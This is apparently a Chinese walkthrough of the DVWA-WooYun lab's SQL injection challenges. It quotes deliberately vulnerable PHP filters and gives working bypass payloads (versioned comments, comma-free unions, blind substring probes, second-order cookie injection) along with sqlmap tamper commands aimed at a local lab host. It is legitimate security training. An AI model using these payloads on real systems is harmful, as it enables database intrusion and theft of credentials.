DVWA-WooYun SQL Injection
乌云靶场 - SQL Injection
Sqli QUERY_STRING
WooYun-2014-61361 Source
inject_check(strtolower($_SERVER['QUERY_STRING']));
$id = $_GET['id'];
$getid = "SELECT first_name, last_name FROM users WHERE user_id = $id";......function inject_check($str) { //防注入函数开始$check=preg_match('/select|order|insert|update|eval|document|delete|injection|jection|link|and|or|from|union|into|load_file|outfile|<script>/',$str);if($check){echo "<script>alert('Filtered!!!');window.history.go(-1);</script>";exit();}else{return $str;}
} 将提交内容转成小写再进行检测,$_SERVER['QUERY_STRING']是获取?后面的值,且并不会自动转换url编码,将提交的内容进行URL编码提交即可
sqlmap使用(带上cookie)
sqlmap -u 'http://192.168.16.82:81/vulnerabilities/WooYun-2014-61361/?id=1&Submit=Submit#' --cookie='PHPSESSID=31onlljpiqovge7adlsulis9m4; security=low' --tamper charencode.py --dbs
Sqli filter #02-Once
WooYun-2014-53384 Source
$id = $_GET['id'];
$id = tsFilter($id);
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";......function tsFilter($value){$value = trim($value);//定义不允许提交的SQl命令和关键字$words = array();$words[] = "add ";$words[] = "and ";$words[] = "count ";$words[] = "order ";$words[] = "table ";$words[] = "by ";$words[] = "create ";$words[] = "delete ";$words[] = "drop ";$words[] = "from ";$words[] = "grant ";$words[] = "insert ";$words[] = "select ";$words[] = "truncate ";$words[] = "update ";$words[] = "use ";$words[] = "--";$words[] = "#";$words[] = "group_concat";$words[] = "column_name";$words[] = "information_schema.columns";$words[] = "table_schema";$words[] = "union ";$words[] = "where ";$words[] = "alert";$value = strtolower($value);//转换为小写foreach($words as $word){if(strstr($value,$word)){$value = str_replace($word,'',$value);}}return $value;
} strstr(str1,str2) 函数用于判断字符串str2是否是str1的子串,如发现提交含关键字并替换为空,
select 写成 seleseclec ct这样就可以绕过
sqlmap有个脚本nonrecursivereplacement.py是在关键字中插入一个关键字的,这里后面带空格,需要修改一下,复制一份
cd /usr/share/sqlmap/tamper && cp nonrecursivereplacement.py sp_nonrecursivereplacement.py将keyworld填进去(php转大写输出一下就行,把特殊字符处理掉,不然报错),然后在替换关键词(截图光标处)加上一个空格
直接sqlmap
sqlmap -u 'http://192.168.16.82:81/vulnerabilities/WooYun-2014-53384/?id=1&Submit=Submit#' --cookie='PHPSESSID=31onlljpiqovge7adlsulis9m4; security=low' --tamper sp_nonrecursivereplacement.py --dbs
Sqli Mysql #01
WooYun-2014-52257 Source
$id = $_GET['id'];
$id = trim(strtolower($id));
$test = _do_query_safe($id);if($test != 1)
{die('SQLi detected!');
}$getid = "SELECT first_name, last_name FROM users WHERE user_id = $id";......function _do_query_safe($sql) {$sql = preg_replace('/\/\*.*\*\//','',$sql);if(strstr($sql,"select")){return -1;}
return 1;
}转小写删除注释再判断是否有select,但并不修改带入SQL的原字符串,只是返回1或-1, 可以使用/*! MySQL-specific code */绕过
1 and 1=2 union /*!12345 select*/ database(),user()
No [Comma] Sqli
WooYun-2014-52248 Source
$id = $_GET['id'];
$ids = explode(',',trim($id));
$id = $ids[0];
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";只是简单的干掉逗号,,union构造两列查当前数据库与用户名
1' union select * from ((select database())a join (select user())b) where '1'='1注意,id参数被引号包含
查用户与密码hash
1' union select * from ((select user from users)a join (select password from users)b) where '1'='1
Sqli using [Slashes]
WooYun-2014-51950 Source
$id = addslashes($_GET['id']);
$id = str_replace("\\\\", "\\", $id);$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";addslashes()默认转义双引和反斜杠,可以这样构造1\' union select database(),user() #,SQL语句为
SELECT first_name, last_name FROM users WHERE user_id = '1\\' union select database(),user() #'
Sqli filter #02-80sec
WooYun-2014-51687 Source
$id = $_GET['id'];
$id = CheckSql($id,'select');
$getid = "SELECT first_name, last_name FROM users WHERE user_id = $id";......//SQL语句过滤程序,由80sec提供,这里作了适当的修改
function CheckSql($db_string,$querytype='select')
{//如果是普通查询语句,直接过滤一些特殊语法if($querytype=='select'){$notallow1 = "[^0-9a-z@\._-]{1,}(union|sleep|benchmark|load_file|outfile)[^0-9a-z@\.-]{1,}";//$notallow2 = "--|/\*";if(eregi($notallow1,$db_string)){exit("<font size='5' color='red'>Safe Alert: Request Error step 1 !</font>");}}//完整的SQL检查while (true){$pos = strpos($db_string, '\'', $pos + 1);if ($pos === false){break;}$clean .= substr($db_string, $old_pos, $pos - $old_pos);while (true){$pos1 = strpos($db_string, '\'', $pos + 1);$pos2 = strpos($db_string, '\\', $pos + 1);if ($pos1 === false){break;}elseif ($pos2 == false || $pos2 > $pos1){$pos = $pos1;break;}$pos = $pos2 + 1;}$clean .= '$s$';$old_pos = $pos + 1;}$clean .= substr($db_string, $old_pos);$clean = trim(strtolower(preg_replace(array('~\s+~s' ), array(' '), $clean)));//老版本的Mysql并不支持union,常用的程序里也不使用union,但是一些黑客使用它,所以检查它if (strpos($clean, 'union') !== false && preg_match('~(^|[^a-z])union($|[^[a-z])~s', $clean) != 0){$fail = true;$error="union detect";}
}eregi()是不区分大小写的,/*!50000union*/绕过eregi($notallow1,$db_string)检测,while (true) 内会将单引号的内容忽略掉,以下循环后变成99 and @`$s$从而绕过检测
99 and @`'` /*!50000union*/ select database(),user() # '完整SQL语句
SELECT first_name, last_name FROM users WHERE user_id = 99 and @`'` /*!50000union*/ select database(),user() # '
Sqli filter #01
WooYun-2014-51505 Source
$id = inject_check($_GET['id']);
$getid = "SELECT first_name, last_name FROM users WHERE user_id = $id"; ......function inject_check($str) { //防注入函数开始$check=preg_match('/select|order|insert|update|eval|document|delete|injection|jection|link|\'|\%|\/\*|\*|\.\.\/|\.\/|\,|\.|--|\"|and|or|from|union|into|load_file|outfile|<script>/',$str);if($check){echo "<script>alert('Filtered!!!');window.history.go(-1);</script>";exit();}else{return $str;}
}可以看到只对小写进行检测,改大写既可绕过,但也过滤了.、,、*等,有这些字符在内都被干掉,可以尝试盲注,以查数据库名为例
二分查找猜长度
1 And length(database())<7;查第一个字符(用二分查找)
1 And ord(substr(database() from 3 for 1))>120;SUBSTR(password FROM 3 FOR 1) 等同于 SUBSTR(PASSWORD,3,1)
SUBSTR(password FROM 2) 等同于 SUBSTR(PASSWORD,2)
-_-!这题比较鸡肋(也可以试试利用报错,如果有的话)。。。
No [Space] Sqli
WooYun-2014-50644 Source
$id = $_GET['id'];
$id = str_replace(" ","",$id);
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";只过滤了空格,可以用注释(/**/)来代替,sqlmap用法
sqlmap -u 'http://192.168.16.82:81/vulnerabilities/WooYun-2014-50644/?id=1&Submit=Submit#' --cookie='PHPSESSID=bq81nmgier6dcbq48apvqmc966; security=low' --tamper='space2comment.py' --dbs
Indirect SQLi #01
WooYun-2013-31669 Source
elseif($_GET['Submit']=='edit'){.......else{setcookie('name',addslashes($_GET['name']));......}}elseif($_GET['Submit']=='view'){if($_COOKIE['id']==null){......}else{$getid = "SELECT user_id, first_name, last_name FROM users WHERE first_name = '".stripslashes($_COOKIE['name'])."'";.......}} 随便用一个已有ID登录,view将cookie中的名称带进去查询,(stripslashes是去掉addslashes转义斜杠),那么修改名称将可导致二次注入,将名称修改为
a' union select database(),user(),1 #点击view完整的SQL为
SELECT user_id, first_name, last_name FROM users WHERE first_name = 'a' union select database(),user(),1 #'
DVWA-WooYun SQL Injection相关推荐
- DVWA之SQL Injection (Blind)
DVWA之SQL Injection (Blind) low 查看源代码可知,对输入字符串没有进行任何过滤 <?phpif( isset( $_GET[ 'Submit' ] ) ) {// G ...
- DVWA靶场SQL Injection(SQL注入)
目录 一.有回显的SQL注入过程 二.Low 三.Medium 四. High 五.Impossible 一.有回显的SQL注入过程 1.找到注入点: 2.通过回显找到闭合方式: 3.使用order ...
- 使用SQLmap对dvwa进行SQL注入测试
SQLmap工具github链接:https://github.com/sqlmapproject/sqlmap 搭建dvwa环境并启动. windows上需要搭建Python环境,下载sqlmap包 ...
- DVWA学习(二)SQL Injection(Blind)
SQL Injection(Blind),即SQL盲注,与一般注入的区别在于,一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是 ...
- DVWA学习(一)SQL Injection
本文参考自https://www.jianshu.com/u/9dac23b54fba,根据自己的学习进度可能会有不同的地方,详细可以查看原文链接. SQL Injection,即SQL注入,是指攻击 ...
- DVWA通关--SQL注入(SQL Injection)
目录 LOW 通关步骤 一.手工注入 二.sqlmap注入 代码分析 MEDIUM 通关步骤 方法一.手工注入 方法二.sqlmap注入 代码分析 HIGH 通关步骤 方法一.手工注入 方法二.sql ...
- DVWA—sql注入( SQL Injection)
DVWA-sql注入( SQL Injection) 原理 将恶意的sql语句拼接到合法的语句中,从而达到执行sql语句的目的. 类型 数字 字符 搜索 过程 1.判断是否存在注入,注入时字符型还是数 ...
- 【Web安全】关于SQL Injection和盲注的探索(DVWA)
文章目录 1 SQL Injection 1.1 解释 1.2 手工注入思路 1.3 low 2 SQL Injection (Blind) 2.1 SQL盲注与普通的SQL注入区别 2.2 low ...
- 使用Sqlmap对dvwa进行sql注入测试(初级阶段)
0.测试准备 1)打开Kali虚拟机终端; 2)打开靶机OWASP,并通过浏览器,输入IP地址进入dvwa的主页,然后选择SQL injection进入SQL注入的测试页面 1.获取DVWA的url和 ...
- DVWA-SQL注入(SQL Injection)低/中/高级别
DVWA是一个用来联系渗透的靶场,其中包含数个漏洞模块,本篇博客向大家简单介绍下SQL注入(SQL Injection)模块三个级别(low/medium/high)的通关步骤 SQL Injecti ...
最新文章
- 金碧辉煌!皇城定制5月22日正式对外运营开业!
- UNIX网络编程——客户/服务器程序设计示范(一)
- prometheus + influxdb + grafana + mysql
- Morphia和MongoDB:不断发展的文档结构
- 修改Tomcat Connector运行模式,优化Tomcat运行性能
- 一切的开始源于网络的虚拟
- 查看oracle大页,在Oracle11.2.0.3.0上开启大页(hugepages)的详细解析
- python定位文件位置_在Python中定位文件位置
- Python 之 文件
- 爬虫-----自定义框架
- 5.Http Server
- 用于敏捷开发的免费 UML 工具 2022
- Extjs6开发环境搭建
- 各个排序算法(^_^)
- PR曲线与ROC曲线绘制
- 计算机nemurt.dll,DDD~领域事件中使用分布式事务
- 有效 TCP RST
- How to setup Assigned Access in Windows 10 (Kiosk Mode) 设置分配的访问权限(Kiosk模式)
- 阿里云盘终于可以分享文文件了!!!
- sql查询包含某个字符_MySQL DBA基本知识点梳理和查询优化